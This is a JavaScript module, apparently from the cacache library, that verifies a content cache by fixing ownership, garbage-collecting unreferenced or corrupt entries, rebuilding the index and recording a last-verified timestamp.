'use strict'

const util = require('util')

const pMap = require('p-map')
const contentPath = require('./content/path')
const fixOwner = require('./util/fix-owner')
const fs = require('@npmcli/fs')
const fsm = require('fs-minipass')
const glob = util.promisify(require('glob'))
const index = require('./entry-index')
const path = require('path')
const rimraf = util.promisify(require('rimraf'))
const ssri = require('ssri')

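// glob only understands forward slashes, so convert Windows-style separators
// in the pattern before matching.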
const globify = pattern => pattern.split('\\').join('/')

const hasOwnProperty = (obj, key) =>
  Object.prototype.hasOwnProperty.call(obj, key)

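// Fill in defaults: a modest concurrency limit and a no-op logger.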
const verifyOpts = (opts) => ({
  concurrency: 20,
  log: { silly () {} },
  ...opts,
})

module.exports = verify

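// Run every verification step in order, merging the stats object each step
// returns and recording per-step timings under stats.runTime.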
async function verify (cache, opts) {
  opts = verifyOpts(opts)
  opts.log.silly('verify', 'verifying cache at', cache)

  const steps = [
    markStartTime,
    fixPerms,
    garbageCollect,
    rebuildIndex,
    cleanTmp,
    writeVerifile,
    markEndTime,
  ]

  const stats = {}
  for (const step of steps) {
    const label = step.name
    const start = new Date()
    const s = await step(cache, opts)
    if (s) {
      Object.keys(s).forEach((k) => {
        stats[k] = s[k]
      })
    }
    const end = new Date()
    if (!stats.runTime) {
      stats.runTime = {}
    }
    stats.runTime[label] = end - start
  }
  stats.runTime.total = stats.endTime - stats.startTime
  opts.log.silly(
    'verify',
    'verification finished for',
    cache,
    'in',
    `${stats.runTime.total}ms`
  )
  return stats
}

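// markStartTime and markEndTime bracket the run so the total duration can be
// computed from the merged stats.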
async function markStartTime (cache, opts) {
  return { startTime: new Date() }
}

async function markEndTime (cache, opts) {
  return { endTime: new Date() }
}

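// Make sure the cache directory exists and has the expected ownership.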
async function fixPerms (cache, opts) {
  opts.log.silly('verify', 'fixing cache permissions')
  await fixOwner.mkdirfix(cache, cache)
  // TODO - fix file permissions too
  await fixOwner.chownr(cache, cache)
  return null
}

// Implements a naive mark-and-sweep tracing garbage collector.
//
// The algorithm is basically as follows:
// 1. Read (and filter) all index entries ("pointers")
// 2. Mark each integrity value as "live"
// 3. Read entire filesystem tree in `content-vX/` dir
// 4. If content is live, verify its checksum and delete it if it fails
// 5. If content is not marked as live, rimraf it.
//
async function garbageCollect (cache, opts) {
  opts.log.silly('verify', 'garbage collecting content')
  const indexStream = index.lsStream(cache)
  const liveContent = new Set()
  indexStream.on('data', (entry) => {
    if (opts.filter && !opts.filter(entry)) {
      return
    }

    liveContent.add(entry.integrity.toString())
  })
  await new Promise((resolve, reject) => {
    indexStream.on('end', resolve).on('error', reject)
  })
  const contentDir = contentPath.contentDir(cache)
  const files = await glob(globify(path.join(contentDir, '**')), {
    follow: false,
    nodir: true,
    nosort: true,
  })
  const stats = {
    verifiedContent: 0,
    reclaimedCount: 0,
    reclaimedSize: 0,
    badContentCount: 0,
    keptSize: 0,
  }
  await pMap(
    files,
    async (f) => {
      const split = f.split(/[/\\]/)
      const digest = split.slice(split.length - 3).join('')
      const algo = split[split.length - 4]
      const integrity = ssri.fromHex(digest, algo)
      if (liveContent.has(integrity.toString())) {
        const info = await verifyContent(f, integrity)
        if (!info.valid) {
          stats.reclaimedCount++
          stats.badContentCount++
          stats.reclaimedSize += info.size
        } else {
          stats.verifiedContent++
          stats.keptSize += info.size
        }
      } else {
        // No entries refer to this content. We can delete.
        stats.reclaimedCount++
        const s = await fs.stat(f)
        await rimraf(f)
        stats.reclaimedSize += s.size
      }
      return stats
    },
    { concurrency: opts.concurrency }
  )
  return stats
}

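// Stat a content file and stream it against its expected integrity. Corrupt
// content is deleted and reported as invalid; a missing file counts as size 0.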
async function verifyContent (filepath, sri) {
  const contentInfo = {}
  try {
    const { size } = await fs.stat(filepath)
    contentInfo.size = size
    contentInfo.valid = true
    await ssri.checkStream(new fsm.ReadStream(filepath), sri)
  } catch (err) {
    if (err.code === 'ENOENT') {
      return { size: 0, valid: false }
    }
    if (err.code !== 'EINTEGRITY') {
      throw err
    }

    await rimraf(filepath)
    contentInfo.valid = false
  }
  return contentInfo
}

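// Group the surviving index entries by hashed key, then rewrite each bucket
// file, dropping entries rejected by the filter or whose content is missing.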
async function rebuildIndex (cache, opts) {
  opts.log.silly('verify', 'rebuilding index')
  const entries = await index.ls(cache)
  const stats = {
    missingContent: 0,
    rejectedEntries: 0,
    totalEntries: 0,
  }
  const buckets = {}
  for (const k in entries) {
    /* istanbul ignore else */
    if (hasOwnProperty(entries, k)) {
      const hashed = index.hashKey(k)
      const entry = entries[k]
      const excluded = opts.filter && !opts.filter(entry)
      excluded && stats.rejectedEntries++
      if (buckets[hashed] && !excluded) {
        buckets[hashed].push(entry)
      } else if (buckets[hashed] && excluded) {
        // skip
      } else if (excluded) {
        buckets[hashed] = []
        buckets[hashed]._path = index.bucketPath(cache, k)
      } else {
        buckets[hashed] = [entry]
        buckets[hashed]._path = index.bucketPath(cache, k)
      }
    }
  }
  await pMap(
    Object.keys(buckets),
    (key) => {
      return rebuildBucket(cache, buckets[key], stats, opts)
    },
    { concurrency: opts.concurrency }
  )
  return stats
}

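// Truncate a bucket file, then re-insert only the entries whose content still
// exists on disk.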
async function rebuildBucket (cache, bucket, stats, opts) {
  await fs.truncate(bucket._path)
  // This needs to be serialized because cacache explicitly
  // lets very racy bucket conflicts clobber each other.
  for (const entry of bucket) {
    const content = contentPath(cache, entry.integrity)
    try {
      await fs.stat(content)
      await index.insert(cache, entry.key, entry.integrity, {
        metadata: entry.metadata,
        size: entry.size,
      })
      stats.totalEntries++
    } catch (err) {
      if (err.code === 'ENOENT') {
        stats.rejectedEntries++
        stats.missingContent++
      } else {
        throw err
      }
    }
  }
}

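// Remove the cache's tmp directory, where in-progress writes are staged.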
function cleanTmp (cache, opts) {
  opts.log.silly('verify', 'cleaning tmp directory')
  return rimraf(path.join(cache, 'tmp'))
}

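// Record the time of this verification run in _lastverified so lastRun()
// can report it later.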
function writeVerifile (cache, opts) {
  const verifile = path.join(cache, '_lastverified')
  opts.log.silly('verify', 'writing verifile to ' + verifile)
  try {
    return fs.writeFile(verifile, `${Date.now()}`)
  } finally {
    fixOwner.chownr.sync(cache, verifile)
  }
}

module.exports.lastRun = lastRun

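// Read the timestamp written by writeVerifile and return it as a Date.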
async function lastRun (cache) {
  const data = await fs.readFile(path.join(cache, '_lastverified'), { encoding: 'utf8' })
  return new Date(+data)
}
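
// Example usage (an illustrative sketch; the cache path and filter are
// hypothetical, and the calls must run inside an async function):
//
//   const verify = require('./verify')
//   const stats = await verify('/path/to/_cacache', {
//     filter: (entry) => entry.key.startsWith('make-fetch-happen:'),
//   })
//   // stats includes verifiedContent, reclaimedCount, reclaimedSize,
//   // badContentCount, keptSize, missingContent, rejectedEntries,
//   // totalEntries, startTime, endTime, and per-step timings in runTime.
//   console.log('last verified at', await verify.lastRun('/path/to/_cacache'))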
